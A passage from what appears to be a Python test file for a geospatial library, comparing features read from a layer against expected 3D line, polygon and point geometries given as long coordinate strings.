# LINESTRING Z (0.5 -1.0 -2.59807621135332,0.543577773425908 -1.01791116395762 -2.58464338569351,0.587546417985528 -1.03693648101917 -2.57439309093773,0.631694860183701 -1.05698461927736 -2.56737453409618,0.675811163398452 -1.07795933672482 -2.56362140807291,0.719683545292469 -1.09975994326827 -2.56315172992158,0.763101394483934 -1.12228178409597 -2.5659677543537,0.805856281596113 -1.14541674207787 -2.57205596291479,0.847742959832148 -1.16905375678694 -2.58138712888039,0.888560350271717 -1.19307935764976 -2.59391645756022,0.928112507159618 -1.21737820866727 -2.60958380133721,0.96620955855235 -1.24183366209053 -2.62831394840886,1.00266861780709 -1.26632831839353 -2.65001698384495,1.03731466153743 -1.29074458985506 -2.67458872122829,1.06998136982112 -1.31496526504393 -2.7019112028064,1.10051192462654 -1.33887407149783 -2.73185326575312,1.12875976262485 -1.36235623389463 -2.76427117182176,1.15458927877392 -1.38529902503655 -2.79900929736714,1.17787647729662 -1.40759230700227 -2.83590088042404,1.19850956692819 -1.42912905986906 -2.8747688212557,1.21638949757537 -1.44980589546683 -2.91542653252918,1.23143043581088 -1.46952355369781 -2.95767883503644,1.24356017692077 -1.48818737903916 -3.00132289466106,1.2527204915264 -1.50570777494116 -3.04614919609277,1.25886740511731 -1.52200063393958 -3.09194254861523,1.26197140915283 -1.53698774141742 -3.138483119139,1.2620176027192 -1.55059715107771 -3.18554748752036,1.25900576406208 -1.56276353032509 -3.23290971909991,1.25295035165112 -1.57342847389788 -3.28034244931235,1.24388043477135 -1.58254078424523 -3.32761797516041,1.23183955397484 -1.59005671730331 -3.37450934831362,1.21688551206218 -1.5959401924907 -3.42079146458413,1.19909009659756 -1.60016296591487 -3.46624214454969,1.17853873528923 -1.6027047659583 -3.51064320013621,1.15533008588991 -1.60355339059327 -3.55378148203954,1.12957556258567 -1.6027047659583 -3.59544990295855,1.10139880114707 -1.60016296591487 -3.63544843172717,1.07093506540992 -1.5959401924907 -3.67358505357321,1.03833059793508 -1.59005671730331 -3.70967669189409,1.00374191796432 -1.58254078424523 -3.74355008712442,0.967335070042516 -1.57342847389788 -3.77504262847653,0.929284826913179 -1.56276353032509 -3.80400313456104,0.889773850513921 -1.55059715107771 -3.83029257913998,0.848991815099414 -1.53698774141741 -3.85378475852869,0.807134496701444 -1.52200063393958 -3.87436689744237,0.764402833297081 -1.50570777494116 -3.891940190379,0.72100196019671 -1.48818737903916 -3.90642027593972,0.677140225282558 -1.46952355369781 -3.91773764180954,0.633028188825132 -1.44980589546683 -3.92583795845446,0.588877612678977 -1.42912905986906 -3.93068233993284,0.544900443710183 -1.40759230700227 -3.93224753056917,0.501307796335731 -1.38529902503655 -3.93052601659399,0.458308939059047 -1.36235623389463 -3.92552606221412,0.416110289866958 -1.33887407149783 -3.91727166993992,0.374914425310669 -1.31496526504393 -3.90580246536015,0.334919108027743 -1.29074458985506 -3.89117350691752,0.296316337373485 -1.26632831839353 -3.87345502159809,0.259291427719229 -1.24183366209053 -3.85273206780345,0.224022118842197 -1.21737820866727 -3.82910412702388,0.190677722677547 -1.19307935764975 -3.80268462627299,0.159418310528662 -1.16905375678694 -3.77360039357605,0.13039394463751 -1.14541674207787 -3.7419910491263,0.103743957803975 -1.12228178409597 -3.70800833503176,0.079596284512354 -1.09975994326827 -3.67181538687033,0.058066846776 -1.07795933672482 -3.63358595054991,0.039258997648375 -1.05698461927736 -3.59350354823325,0.023263025071983 -1.03693648101917 -3.55176059733134,0.010155718446952 -1.01791116395762 -3.50855748679486,0.0 -1.0 -3.46410161513776)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.5 -1.0 -2.59807621135332,0.543577773425908 -1.01791116395762 -2.58464338569351,0.587546417985528 -1.03693648101917 -2.57439309093773,0.631694860183701 -1.05698461927736 -2.56737453409618,0.675811163398452 -1.07795933672482 -2.56362140807291,0.719683545292469 -1.09975994326827 -2.56315172992158,0.763101394483934 -1.12228178409597 -2.5659677543537,0.805856281596113 -1.14541674207787 -2.57205596291479,0.847742959832148 -1.16905375678694 -2.58138712888039,0.888560350271717 -1.19307935764976 -2.59391645756022,0.928112507159618 -1.21737820866727 -2.60958380133721,0.96620955855235 -1.24183366209053 -2.62831394840886,1.00266861780709 -1.26632831839353 -2.65001698384495,1.03731466153743 -1.29074458985506 -2.67458872122829,1.06998136982112 -1.31496526504393 -2.7019112028064,1.10051192462654 -1.33887407149783 -2.73185326575312,1.12875976262485 -1.36235623389463 -2.76427117182176,1.15458927877392 -1.38529902503655 -2.79900929736714,1.17787647729662 -1.40759230700227 -2.83590088042404,1.19850956692819 -1.42912905986906 -2.8747688212557,1.21638949757537 -1.44980589546683 -2.91542653252918,1.23143043581088 -1.46952355369781 -2.95767883503644,1.24356017692077 -1.48818737903916 -3.00132289466106,1.2527204915264 -1.50570777494116 -3.04614919609277,1.25886740511731 -1.52200063393958 -3.09194254861523,1.26197140915283 -1.53698774141742 -3.138483119139,1.2620176027192 -1.55059715107771 -3.18554748752036,1.25900576406208 -1.56276353032509 -3.23290971909991,1.25295035165112 -1.57342847389788 -3.28034244931235,1.24388043477135 -1.58254078424523 -3.32761797516041,1.23183955397484 -1.59005671730331 -3.37450934831362,1.21688551206218 -1.5959401924907 -3.42079146458413,1.19909009659756 -1.60016296591487 -3.46624214454969,1.17853873528923 -1.6027047659583 -3.51064320013621,1.15533008588991 -1.60355339059327 -3.55378148203954,1.12957556258567 -1.6027047659583 -3.59544990295855,1.10139880114707 -1.60016296591487 -3.63544843172717,1.07093506540992 -1.5959401924907 -3.67358505357321,1.03833059793508 -1.59005671730331 -3.70967669189409,1.00374191796432 -1.58254078424523 -3.74355008712442,0.967335070042516 -1.57342847389788 -3.77504262847653,0.929284826913179 -1.56276353032509 -3.80400313456104,0.889773850513921 -1.55059715107771 -3.83029257913998,0.848991815099414 -1.53698774141741 -3.85378475852869,0.807134496701444 -1.52200063393958 -3.87436689744237,0.764402833297081 -1.50570777494116 -3.891940190379,0.72100196019671 -1.48818737903916 -3.90642027593972,0.677140225282558 -1.46952355369781 -3.91773764180954,0.633028188825132 -1.44980589546683 -3.92583795845446,0.588877612678977 -1.42912905986906 -3.93068233993284,0.544900443710183 -1.40759230700227 -3.93224753056917,0.501307796335731 -1.38529902503655 -3.93052601659399,0.458308939059047 -1.36235623389463 -3.92552606221412,0.416110289866958 -1.33887407149783 -3.91727166993992,0.374914425310669 -1.31496526504393 -3.90580246536015,0.334919108027743 -1.29074458985506 -3.89117350691752,0.296316337373485 -1.26632831839353 -3.87345502159809,0.259291427719229 -1.24183366209053 -3.85273206780345,0.224022118842197 -1.21737820866727 -3.82910412702388,0.190677722677547 -1.19307935764975 -3.80268462627299,0.159418310528662 -1.16905375678694 -3.77360039357605,0.13039394463751 -1.14541674207787 -3.7419910491263,0.103743957803975 -1.12228178409597 -3.70800833503176,0.079596284512354 -1.09975994326827 -3.67181538687033,0.058066846776 -1.07795933672482 -3.63358595054991,0.039258997648375 -1.05698461927736 -3.59350354823325,0.023263025071983 -1.03693648101917 -3.55176059733134,0.010155718446952 -1.01791116395762 -3.50855748679486,0.0 -1.0 -3.46410161513776)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):45
# EntityHandle (String) = 1EE
# POLYGON Z ((1 -1 -1.73205080756888,1.75 -1.5 -2.1650635094611,1.25 -1.5 -3.03108891324553,0.5 -1.0 -2.59807621135332,1 -1 -1.73205080756888))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1 -1 -1.73205080756888,1.75 -1.5 -2.1650635094611,1.25 -1.5 -3.03108891324553,0.5 -1.0 -2.59807621135332,1 -1 -1.73205080756888))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):46
# EntityHandle (String) = 1EF
# POLYGON Z ((1.5 -2.0 -4.33012701892219,1.0 -2.0 -5.19615242270663,0.25 -1.5 -4.76313972081441,0.75 -1.5 -3.89711431702997,1.5 -2.0 -4.33012701892219))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((1.5 -2.0 -4.33012701892219,1.0 -2.0 -5.19615242270663,0.25 -1.5 -4.76313972081441,0.75 -1.5 -3.89711431702997,1.5 -2.0 -4.33012701892219))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):47
# EntityHandle (String) = 1F1
# POLYGON Z ((2.0 -4.0 -10.3923048454133,1.5 -4.0 -11.2583302491977,2.25 -4.5 -11.6913429510899,2.75 -4.5 -10.8253175473055,2.0 -4.0 -10.3923048454133))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((2.0 -4.0 -10.3923048454133,1.5 -4.0 -11.2583302491977,2.25 -4.5 -11.6913429510899,2.75 -4.5 -10.8253175473055,2.0 -4.0 -10.3923048454133))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):48
# EntityHandle (String) = 1F2
# LINESTRING (0.5 -1.0,0.53846153846154 -1.07692307692308,0.576923076923078 -1.15384615384615,0.615384615384617 -1.23076923076923,0.653846153846155 -1.30769230769231,0.692307692307694 -1.38461538461538,0.730769230769232 -1.46153846153846,0.769230769230771 -1.53846153846154,0.807692307692309 -1.61538461538462,0.846153846153848 -1.69230769230769,0.884615384615386 -1.76923076923077,0.923076923076924 -1.84615384615385,0.961538461538463 -1.92307692307692,1.0 -2.0,1.03846153846154 -2.07692307692308,1.07692307692308 -2.15384615384615,1.11538461538462 -2.23076923076923,1.15384615384616 -2.30769230769231,1.19230769230769 -2.38461538461538,1.23076923076923 -2.46153846153846,1.26923076923077 -2.53846153846154,1.30769230769231 -2.61538461538461,1.34615384615385 -2.69230769230769,1.38461538461539 -2.76923076923077,1.42307692307693 -2.84615384615385,1.46153846153846 -2.92307692307692,1.5 -3.0,1.53846153846154 -3.07692307692308,1.57692307692308 -3.15384615384615,1.61538461538462 -3.23076923076923,1.65384615384616 -3.30769230769231,1.6923076923077 -3.38461538461539,1.73076923076923 -3.46153846153846,1.76923076923077 -3.53846153846154,1.80769230769231 -3.61538461538461,1.84615384615385 -3.69230769230769,1.88461538461539 -3.76923076923077,1.92307692307693 -3.84615384615385,1.96153846153847 -3.92307692307692,2.0 -4.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (0.5 -1.0,0.53846153846154 -1.07692307692308,0.576923076923078 -1.15384615384615,0.615384615384617 -1.23076923076923,0.653846153846155 -1.30769230769231,0.692307692307694 -1.38461538461538,0.730769230769232 -1.46153846153846,0.769230769230771 -1.53846153846154,0.807692307692309 -1.61538461538462,0.846153846153848 -1.69230769230769,0.884615384615386 -1.76923076923077,0.923076923076924 -1.84615384615385,0.961538461538463 -1.92307692307692,1.0 -2.0,1.03846153846154 -2.07692307692308,1.07692307692308 -2.15384615384615,1.11538461538462 -2.23076923076923,1.15384615384616 -2.30769230769231,1.19230769230769 -2.38461538461538,1.23076923076923 -2.46153846153846,1.26923076923077 -2.53846153846154,1.30769230769231 -2.61538461538461,1.34615384615385 -2.69230769230769,1.38461538461539 -2.76923076923077,1.42307692307693 -2.84615384615385,1.46153846153846 -2.92307692307692,1.5 -3.0,1.53846153846154 -3.07692307692308,1.57692307692308 -3.15384615384615,1.61538461538462 -3.23076923076923,1.65384615384616 -3.30769230769231,1.6923076923077 -3.38461538461539,1.73076923076923 -3.46153846153846,1.76923076923077 -3.53846153846154,1.80769230769231 -3.61538461538461,1.84615384615385 -3.69230769230769,1.88461538461539 -3.76923076923077,1.92307692307693 -3.84615384615385,1.96153846153847 -3.92307692307692,2.0 -4.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):49
# EntityHandle (String) = 1F3
# LINESTRING (-3.25 -0.5,-3.07367580370539 -0.493674033614862,-2.89709873733542 -0.487853807380434,-2.72001593081474 -0.483045061447428,-2.542174514068 -0.479753535966554,-2.36332161701984 -0.478484971088521,-2.1832043695949 -0.479745106964042,-2.00156990171783 -0.484039683743825,-1.81816534331327 -0.491874441578583,-1.63273782430587 -0.503755120619026,-1.44503447462027 -0.520187461015863,-1.25480242418112 -0.541677202919806,-1.06178880291306 -0.568730086481565,-0.865740740740739 -0.601851851851852,-0.666405367588798 -0.641548239181375,-0.463529813381883 -0.688324988620846,-0.256861208044639 -0.742687840320976,-0.04614668150171 -0.805142534432475,0.168866636322258 -0.876194811106053,0.388431615502622 -0.956350410492422,0.612790589861596 -1.04609400023601,0.841943559399181 -1.14542558033682,1.07564819029316 -1.25386048315042,1.31365161246818 -1.3708929685261,1.55570095584888 -1.49601729631315,1.80154335035992 -1.62872772636086,2.05092592592592 -1.76851851851852,2.30359581247155 -1.91488393263541,2.55930013992144 -2.06731822856083,2.81778603820024 -2.22531566614407,3.07880063723259 -2.38837050523441,3.34209106694314 -2.55597700568115,3.60740445725653 -2.72762942733357,3.87448793809741 -2.90282203004097,4.14308863939042 -3.08104907365262,4.4129536910602 -3.26180481801784,4.68383022303141 -3.44458352298589,4.95546536522868 -3.62887944840608,5.22760624757667 -3.81418685412768,5.5 -4.0)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-3.25 -0.5,-3.07367580370539 -0.493674033614862,-2.89709873733542 -0.487853807380434,-2.72001593081474 -0.483045061447428,-2.542174514068 -0.479753535966554,-2.36332161701984 -0.478484971088521,-2.1832043695949 -0.479745106964042,-2.00156990171783 -0.484039683743825,-1.81816534331327 -0.491874441578583,-1.63273782430587 -0.503755120619026,-1.44503447462027 -0.520187461015863,-1.25480242418112 -0.541677202919806,-1.06178880291306 -0.568730086481565,-0.865740740740739 -0.601851851851852,-0.666405367588798 -0.641548239181375,-0.463529813381883 -0.688324988620846,-0.256861208044639 -0.742687840320976,-0.04614668150171 -0.805142534432475,0.168866636322258 -0.876194811106053,0.388431615502622 -0.956350410492422,0.612790589861596 -1.04609400023601,0.841943559399181 -1.14542558033682,1.07564819029316 -1.25386048315042,1.31365161246818 -1.3708929685261,1.55570095584888 -1.49601729631315,1.80154335035992 -1.62872772636086,2.05092592592592 -1.76851851851852,2.30359581247155 -1.91488393263541,2.55930013992144 -2.06731822856083,2.81778603820024 -2.22531566614407,3.07880063723259 -2.38837050523441,3.34209106694314 -2.55597700568115,3.60740445725653 -2.72762942733357,3.87448793809741 -2.90282203004097,4.14308863939042 -3.08104907365262,4.4129536910602 -3.26180481801784,4.68383022303141 -3.44458352298589,4.95546536522868 -3.62887944840608,5.22760624757667 -3.81418685412768,5.5 -4.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):50
# EntityHandle (String) = 1F4
# POINT Z (1.75 -3.5 -9.09326673973661)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (1.75 -3.5 -9.09326673973661)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):51
# EntityHandle (String) = 1F5
# POINT Z (5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):52
# EntityHandle (String) = 1F6
# LINESTRING Z (0 0 0,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):53
# EntityHandle (String) = 1F7
# LINESTRING Z (1.375 0.25 -0.21650635094611,2.0 1.0 -9.68245836551854e-17,2.125 -0.25 -0.649519052838329,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.375 0.25 -0.21650635094611,2.0 1.0 -9.68245836551854e-17,2.125 -0.25 -0.649519052838329,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):54
# EntityHandle (String) = 1F8
# LINESTRING Z (1.375 0.25 -0.21650635094611,2.125 -0.25 -0.649519052838329,2.75 0.5 -0.43301270189222,1.375 0.25 -0.21650635094611)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (1.375 0.25 -0.21650635094611,2.125 -0.25 -0.649519052838329,2.75 0.5 -0.43301270189222,1.375 0.25 -0.21650635094611)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):55
# EntityHandle (String) = 1FD
# LINESTRING Z (3.71114561800017 0.105572809000085 -0.866025403784439,3.77009625337411 -0.001434563330173 -0.933566819059727,3.83747480591229 -0.103563047131737 -1.00077917934903,3.91295301407961 -0.200315082697444 -1.06733503278919,3.99616315563294 -0.2912193038355 -1.13291012595241,4.08669983912687 -0.37583283431818 -1.19718498357639,4.18412197894014 -0.453743445530294 -1.25984646501566,4.28795494420042 -0.524571564805566 -1.32058928983137,4.39769287113821 -0.587972124666501 -1.37911752508686,4.51280112760429 -0.643636243958462 -1.43514602710321,4.6327189177438 -0.691292732687594 -1.48840183065055,4.75686201413727 -0.730709413231224 -1.53862547880726,4.88462560409789 -0.761694251483893 -1.58557228700798,5.01538723625813 -0.784096292428219 -1.62901353512224,5.14850985309022 -0.797806395572568 -1.66873758175591,5.28334489458639 -0.802757766672552 -1.70455089534686,5.41923545797803 -0.798926283145887 -1.7362789970312,5.55551949809999 -0.786330611595171 -1.76376731068683,5.691533052808 -0.76503211686609 -1.78688191601273,5.82661347773556 -0.735134563084044 -1.80551020097523,5.96010267463067 -0.69678360812577 -1.8195614104425,6.09135029754434 -0.650166093988798 -1.82896708833443,6.2197169212507 -0.595509136516029 -1.83368141113379,6.34457715646241 -0.533079018910172 -1.83368141113379,6.46532269666444 -0.463179894428748 -1.82896708833443,6.58136528172222 -0.386152304579996 -1.8195614104425,6.69213956382591 -0.302371520038872 -1.80551020097523,6.79710586180808 -0.212245712366048 -1.78688191601273,6.89575279041615 -0.116213965437088 -1.76376731068683,6.9875997517299 -0.014744136269953 -1.7362789970312,7.07219927658622 0.091669424327363 -1.70455089534686,7.14913920460393 0.202508280184287 -1.66873758175591,7.2180446921877 0.317232435536567 -1.62901353512224,7.27858003872839 0.435282965831356 -1.58557228700798,7.33045032210263 0.556084740751457 -1.53862547880726,7.37340283550381 0.679049226192411 -1.48840183065055,7.4072283186042 0.803577351541497 -1.43514602710321,7.43176197705028 0.929062428289537 -1.37911752508686,7.44688428532421 1.05489310575633 -1.32058928983137,7.45252156906016 1.18045634952971 -1.25984646501566,7.44864636397843 1.3051404281076 -1.19718498357639,7.43527754968864 1.42833789319235 -1.13291012595241,7.41248025771019 1.54944853911785 -1.06733503278919,7.38036555415802 1.66788232699113 -1.00077917934903,7.33908989863968 1.78306225930261 -0.933566819059728,7.28885438199984 1.89442719099992 -0.86602540378444,
# 7.2299037466259 2.00143456333018 -0.798483988509152,7.16252519408772 2.10356304713174 -0.731271628219845,7.08704698592039 2.20031508269745 -0.664715774779688,7.00383684436707 2.2912193038355 -0.599140681616468,6.91330016087314 2.37583283431818 -0.534865823992492,6.81587802105987 2.4537434455303 -0.472204342553219,6.71204505579959 2.52457156480557 -0.411461517737508,6.6023071288618 2.5879721246665 -0.352933282482017,6.48719887239572 2.64363624395846 -0.296904780465671,6.36728108225621 2.6912927326876 -0.24364897691833,6.24313798586274 2.73070941323123 -0.19342532876162,6.11537439590212 2.7616942514839 -0.146478520560899,5.98461276374187 2.78409629242822 -0.103037272446642,5.85149014690979 2.79780639557257 -0.0633132258129652,5.71665510541362 2.80275776667256 -0.0274999122220189,5.58076454202198 2.79892628314589 0.00422818946232298,5.44448050190002 2.78633061159517 0.0317165031179519,5.30846694719201 2.76503211686609 0.0548311084438533,5.17338652226444 2.73513456308405 0.0734593934063514,5.03989732536933 2.69678360812577 0.0875106028736174,4.90864970245567 2.6501660939888 0.0969162807655497,4.78028307874931 2.59550913651603 0.101630603564914,4.6554228435376 2.53307901891017 0.101630603564914,4.53467730333557 2.46317989442875 0.0969162807655497,4.41863471827779 2.38615230458 0.0875106028736175,4.3078604361741 2.30237152003888 0.0734593934063515,4.20289413819193 2.21224571236605 0.0548311084438534,4.10424720958385 2.11621396543709 0.031716503117952,4.01240024827011 2.01474413626996 0.00422818946232319,3.92780072341379 1.90833057567264 -0.0274999122220187,3.85086079539608 1.79749171981572 -0.0633132258129645,3.7819553078123 1.68276756446344 -0.103037272446642,3.72141996127162 1.56471703416865 -0.146478520560898,3.66954967789738 1.44391525924855 -0.19342532876162,3.6265971644962 1.32095077380759 -0.243648976918329,3.5927716813958 1.19642264845851 -0.296904780465671,3.56823802294973 1.07093757171047 -0.352933282482016,3.5531157146758 0.945106894243672 -0.411461517737508,3.54747843093985 0.819543650470287 -0.472204342553219,3.55135363602158 0.694859571892403 -0.534865823992493,3.56472245031136 0.571662106807651 -0.599140681616467,3.58751974228981 0.450551460882157 -0.664715774779687,3.61963444584198 0.332117673008871 -0.731271628219845,3.66091010136033 0.216937740697387 -0.798483988509152,3.71114561800017 0.105572809000085 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (3.71114561800017 0.105572809000085 -0.866025403784439,3.77009625337411 -0.001434563330173 -0.933566819059727,3.83747480591229 -0.103563047131737 -1.00077917934903,3.91295301407961 -0.200315082697444 -1.06733503278919,3.99616315563294 -0.2912193038355 -1.13291012595241,4.08669983912687 -0.37583283431818 -1.19718498357639,4.18412197894014 -0.453743445530294 -1.25984646501566,4.28795494420042 -0.524571564805566 -1.32058928983137,4.39769287113821 -0.587972124666501 -1.37911752508686,4.51280112760429 -0.643636243958462 -1.43514602710321,4.6327189177438 -0.691292732687594 -1.48840183065055,4.75686201413727 -0.730709413231224 -1.53862547880726,4.88462560409789 -0.761694251483893 -1.58557228700798,5.01538723625813 -0.784096292428219 -1.62901353512224,5.14850985309022 -0.797806395572568 -1.66873758175591,5.28334489458639 -0.802757766672552 -1.70455089534686,5.41923545797803 -0.798926283145887 -1.7362789970312,5.55551949809999 -0.786330611595171 -1.76376731068683,5.691533052808 -0.76503211686609 -1.78688191601273,5.82661347773556 -0.735134563084044 -1.80551020097523,5.96010267463067 -0.69678360812577 -1.8195614104425,6.09135029754434 -0.650166093988798 -1.82896708833443,6.2197169212507 -0.595509136516029 -1.83368141113379,6.34457715646241 -0.533079018910172 -1.83368141113379,6.46532269666444 -0.463179894428748 -1.82896708833443,6.58136528172222 -0.386152304579996 -1.8195614104425,6.69213956382591 -0.302371520038872 -1.80551020097523,6.79710586180808 -0.212245712366048 -1.78688191601273,6.89575279041615 -0.116213965437088 -1.76376731068683,6.9875997517299 -0.014744136269953 -1.7362789970312,7.07219927658622 0.091669424327363 -1.70455089534686,7.14913920460393 0.202508280184287 -1.66873758175591,7.2180446921877 0.317232435536567 -1.62901353512224,7.27858003872839 0.435282965831356 -1.58557228700798,7.33045032210263 0.556084740751457 -1.53862547880726,7.37340283550381 0.679049226192411 -1.48840183065055,7.4072283186042 0.803577351541497 -1.43514602710321,7.43176197705028 0.929062428289537 -1.37911752508686,7.44688428532421 1.05489310575633 -1.32058928983137,7.45252156906016 1.18045634952971 -1.25984646501566,7.44864636397843 1.3051404281076 -1.19718498357639,7.43527754968864 1.42833789319235 -1.13291012595241,7.41248025771019 1.54944853911785 -1.06733503278919,7.38036555415802 1.66788232699113 -1.00077917934903,7.33908989863968 1.78306225930261 -0.933566819059728,7.28885438199984 1.89442719099992 -0.86602540378444,7.2299037466259 2.00143456333018 -0.798483988509152,7.16252519408772 2.10356304713174 -0.731271628219845,7.08704698592039 2.20031508269745 -0.664715774779688,' + \
'7.00383684436707 2.2912193038355 -0.599140681616468,6.91330016087314 2.37583283431818 -0.534865823992492,6.81587802105987 2.4537434455303 -0.472204342553219,6.71204505579959 2.52457156480557 -0.411461517737508,6.6023071288618 2.5879721246665 -0.352933282482017,6.48719887239572 2.64363624395846 -0.296904780465671,6.36728108225621 2.6912927326876 -0.24364897691833,6.24313798586274 2.73070941323123 -0.19342532876162,6.11537439590212 2.7616942514839 -0.146478520560899,5.98461276374187 2.78409629242822 -0.103037272446642,5.85149014690979 2.79780639557257 -0.0633132258129652,5.71665510541362 2.80275776667256 -0.0274999122220189,5.58076454202198 2.79892628314589 0.00422818946232298,5.44448050190002 2.78633061159517 0.0317165031179519,5.30846694719201 2.76503211686609 0.0548311084438533,5.17338652226444 2.73513456308405 0.0734593934063514,5.03989732536933 2.69678360812577 0.0875106028736174,4.90864970245567 2.6501660939888 0.0969162807655497,4.78028307874931 2.59550913651603 0.101630603564914,4.6554228435376 2.53307901891017 0.101630603564914,4.53467730333557 2.46317989442875 0.0969162807655497,4.41863471827779 2.38615230458 0.0875106028736175,4.3078604361741 2.30237152003888 0.0734593934063515,4.20289413819193 2.21224571236605 0.0548311084438534,4.10424720958385 2.11621396543709 0.031716503117952,4.01240024827011 2.01474413626996 0.00422818946232319,3.92780072341379 1.90833057567264 -0.0274999122220187,3.85086079539608 1.79749171981572 -0.0633132258129645,3.7819553078123 1.68276756446344 -0.103037272446642,3.72141996127162 1.56471703416865 -0.146478520560898,3.66954967789738 1.44391525924855 -0.19342532876162,3.6265971644962 1.32095077380759 -0.243648976918329,3.5927716813958 1.19642264845851 -0.296904780465671,3.56823802294973 1.07093757171047 -0.352933282482016,3.5531157146758 0.945106894243672 -0.411461517737508,3.54747843093985 0.819543650470287 -0.472204342553219,3.55135363602158 0.694859571892403 -0.534865823992493,3.56472245031136 0.571662106807651 -0.599140681616467,3.58751974228981 0.450551460882157 -0.664715774779687,3.61963444584198 0.332117673008871 -0.731271628219845,3.66091010136033 0.216937740697387 -0.798483988509152,3.71114561800017 0.105572809000085 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):56
# EntityHandle (String) = 1FE
# LINESTRING Z (4.25 -0.5 -1.29903810567666,5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.25 -0.5 -1.29903810567666,5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):57
# EntityHandle (String) = 1FF
# LINESTRING Z (5.5 1.0 -0.866025403784439,6.75 2.5 -0.43301270189222)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (5.5 1.0 -0.866025403784439,6.75 2.5 -0.43301270189222)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):58
# EntityHandle (String) = 200
# LINESTRING Z (4.75 1.5 -0.43301270189222,5.5 1.0 -0.866025403784439)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (4.75 1.5 -0.43301270189222,5.5 1.0 -0.866025403784439)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):59
# EntityHandle (String) = 201
# LINESTRING Z (5.5 1.0 -0.866025403784439,6.25 0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (5.5 1.0 -0.866025403784439,6.25 0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):60
# EntityHandle (String) = 202
# LINESTRING Z (4.25 -0.5 -1.29903810567666,4.30536229248331 -0.531224312261799 -1.32818874766841,4.36654473979309 -0.554988653592388 -1.35508777630525,4.43324926719606 -0.571177246509588 -1.37960414222355,4.50515089693985 -0.579711221815978 -1.40161840415293,4.58189933151187 -0.580549002841697 -1.42102331082214,4.6631206602536 -0.573686508001801 -1.43772432347645,4.74841918101576 -0.559157170681335 -1.451640076461,4.83737932797937 -0.53703177635124 -1.46270277362604,4.92956769625067 -0.507418117708657 -1.47085851862302,5.02453515336618 -0.470460469521736 -1.47606757748212,5.12181902742094 -0.426338885737475 -1.47830457219218,5.22094536115948 -0.375268322276984 -1.47755860433986,5.32143122104797 -0.317497589791849 -1.47383330820552,5.42278705007785 -0.253308141483641 -1.46714683305749,5.52451905283833 -0.183012701892219 -1.45753175473055,5.62613160123803 -0.106953743333199 -1.44503491691981,5.7271296491552 -0.025501817407262 -1.42971720296291,5.82702114425268 0.060946250290002 -1.41165323922251,5.92531942520741 0.151969293462501 -1.39093103151418,6.02154559267549 0.247123856993501 -1.36765153635088,6.11523084244164 0.345946357414384 -1.34192816909299,6.2059187493862 0.4479553414367 -1.31388625140011,6.29316749114245 0.552653831544204 -1.28366240067645,6.37655200061077 0.659531747217344 -1.25140386448466,6.45566603684282 0.768068389994292 -1.21726780317044,6.53012416420658 0.877734980261504 -1.18142052419318,6.59956363019005 0.987997233414845 -1.1440366718927,6.66364613269498 1.09831796284048 -1.10529837663958,6.72205946821072 1.20815969703403 -1.06539436751435,6.77451905283833 1.31698729810778 -1.02451905283833,6.82076930875472 1.4242705689286 -0.982871573035841,6.86058490936212 1.52948683618513 -0.940654830442097,6.89377187705662 1.63212349679959 -0.898074500783399,6.92016852826756 1.73168051527848 -0.855338031145687,6.93964626116363 1.8276728598352 -0.81265362931318,6.95211018218804 1.91963286541618 -0.770229249400985,6.95749956837044 2.00711251211804 -0.72827157872355,6.95578816316308 2.08968560789544 -0.686985030834846,6.9469843043601 2.166949864926 -0.646570749646076,6.93113088347664 2.23852885951603 -0.607225629472764,6.90830513678565 2.30407386599898 -0.569141355785437,6.87861826903058 2.36326555569183 -0.53250347133728,6.84221491164701 2.41581555263232 -0.497490472218499,6.79927241813288 2.46146783851767 -0.464272938241304,6.75 2.5 -0.43301270189222,6.69463770751669 2.5312243122618 -0.40386205990047,6.63345526020692 2.55498865359239 -0.376963031263626,
